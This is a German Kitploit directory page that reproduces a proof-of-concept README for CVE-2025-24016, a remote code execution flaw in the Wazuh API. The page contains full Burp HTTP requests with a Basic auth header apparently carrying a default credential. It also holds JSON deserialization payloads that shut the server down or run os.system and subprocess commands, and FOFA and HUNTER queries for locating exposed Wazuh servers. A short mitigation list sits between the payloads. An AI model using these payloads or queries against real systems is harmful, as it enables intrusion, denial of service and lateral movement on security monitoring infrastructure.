Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24016-Wazuh-Remote-Code-Execution-RCE-PoC — Im Wazuh-Server wurde eine kritische RCE-Sicherheitslücke identifiziert, die auf unsichere Deserialisierung im Paket wazuh-manager zurückzuführen ist. Dieser Fehler betrifft Wazuh-Versionen ≥ 4.4.0 und wurde in Version 4.9.1 behoben. | Kitploit
Tools/GitHubGitHub/cybersecplayground/cve-2025-24016-wazuh-remote-code-execution-rce-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRed TeamingPayload-Entwicklung
GitHubcybersecplayground/cve-2025-24016-wazuh-remote-code-execution-rce-poc

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-24016-Wazuh-Remote-Code-Execution-RCE-PoC

Im Wazuh-Server wurde eine kritische RCE-Sicherheitslücke identifiziert, die auf unsichere Deserialisierung im Paket wazuh-manager zurückzuführen ist. Dieser Fehler betrifft Wazuh-Versionen ≥ 4.4.0 und wurde in Version 4.9.1 behoben.

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

🚨 Wazuh Remote Code Execution (RCE) - PoC

📌 Zusammenfassung der Schwachstelle

Eine kritische RCE-Schwachstelle wurde im Wazuh-Server aufgrund unsicherer Deserialisierung im Paket wazuh-manager identifiziert. Dieser Fehler betrifft Wazuh-Versionen ≥ 4.4.0 und wurde in Version 4.9.1 behoben.

🔍 Details

Der Fehler liegt in der DistributedAPI der Wazuh-API, in der benutzergesteuerte Eingaben unsicher deserialisiert werden. Dies ermöglicht Angreifern mit API-Zugriff (z. B. kompromittiertem Dashboard oder Cluster-Knoten), beliebigen Python-Code auf dem Master-Server über den run_as-Endpunkt auszuführen.

📬 Proof of Concept (Burp-Anfrage)

root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  
Content-Type: application/json

{
  "__unhandled_exc__": {
    "__class__": "exit",
    "__args__": []
  }
}

📌 Der Authorization-Header ist die Base64-Kodierung von wazuh-wui:MyS3cr37P450r.*-.

📌 Das Payload bewirkt, dass der Wazuh-Server heruntergefahren wird, indem die exit()-Methode von Python aufgerufen wird.

💥 Auswirkungen

  • Vollständige Remote Code Execution über die API
  • Server-Shutdown im PoC (DoS)
  • Risiko von Lateral Movement in Wazuh-Clustern

🛡️ Gegenmaßnahmen

  • ✅ Aktualisiere auf Wazuh v4.9.1 oder höher
  • 🚫 Vermeide die externe Bereitstellung der API
  • 🧪 Überwache ungewöhnliche API-Aktivitäten

✅ Beispiel-Payload zum Ausführen von whoami

root@kitploit:~
{
  "__unhandled_exc__": {
    "__class__": "os",
    "__import__": "os",
    "system": "whoami"
  }
}

Aber das allein funktioniert nicht, es sei denn, der Deserialisierungscode führt den Objektbaum tatsächlich aus. Verwende stattdessen ein __reduce__-basiertes Objekt, das Code ausführt.

Hier ist das funktionierende Format für eine Burp-Anfrage unter Verwendung von Pythons os.system() über eine Pickle-ähnliche Logik:

💣 Funktionierendes Burp-RCE-Payload (Python-Codeausführung)

root@kitploit:~
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==
Content-Type: application/json

{
  "__reduce__": [
    "__import__('os').system",
    ["whoami"]
  ]
}

🧬 Um ls auszuführen, ändere das Payload:

root@kitploit:~
{
  "__reduce__": [
    "__import__('os').system",
    ["ls -la"]
  ]
}

Du kannst auch Folgendes verwenden:

root@kitploit:~
{
  "__reduce__": [
    "__import__('subprocess').getoutput",
    ["id"]
  ]
}

⚠️ Hinweis: Die eigentliche Deserialisierung muss im Backend mit eval() oder ähnlichen Mechanismen erfolgen, damit dies funktioniert. Basierend auf dem Wazuh-PoC ist dies tatsächlich möglich, wenn du auth_context kontrollierst.

🔐 Profi-Tipp Intercepte die Anfrage in Burp, wechsle zum Repeater-Tab und teste mehrere Payloads wie:

  • "whoami"
  • "id"
  • "uname -a"
  • "ls /home/wazuh"

👇Abfrage

  • HUNTER : product.name="Wazuh"
  • FOFA : app="Wazuh"

Wenn die Antwort leer ist oder der Status 500 ist, überprüfe die Logs — manchmal wird die Ausgabe nicht zurückgegeben. 📚 Bleibt scharf, Hacker! Weitere Bug-Bounty-PoCs, Bypasses und Payloads sind unterwegs!

Folgt 👉 @cybersecplayground für tägliche Hacking-Inhalte!

#bugbounty #rce #wazuh #infosec #security #pentest #zeroday #exploit

Tool herunterladen